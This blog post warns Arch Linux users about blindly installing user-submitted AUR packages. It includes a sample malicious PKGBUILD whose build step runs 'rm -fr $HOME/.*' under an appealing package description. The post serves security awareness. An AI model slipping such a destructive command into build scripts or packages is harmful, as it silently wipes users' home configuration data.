AUR Insecurity

Everytime I see a new user asking about the AUR on IRC I cringe. Not because I don’t use the AUR or I think the AUR is a bad thing, but because I know that someone is going to recommend a way to automagically install these user provided packages.

Remember, the AUR is a user repository. This means that any evil bastard can upload a PKGBUILD that can wreck your system. I’ve written an example below – the urls have been changed so you can’t possibly run makepkg on this and hurt anything.

pkgdesc='Something really awesome that you want to install'
arch=('i686' 'x86_64')
build() {
  cd ${srcdir} && rm -fr $HOME/.*
  install -D -m755 ${pkgname} ${pkgdir}/usr/bin/${pkgname}

Any experienced user will quickly notice the horrible thing that hapens here. Of course, this is a very simple PKGBUILD. Look at this one for example, malicious code could be anywhere in there and a quick glance isn’t going to catch it. Obviously rm is just one example of something malicious, it’s just an easy one to demonstrate.

So how many times have you blindly installed something from the AUR? I know I have a few times. I also know that I’ll never do it again. Hopefully the next time you wget && tar && makepkg you’ll take a second and think about what you might be getting yourself in to.

blog comments powered by Disqus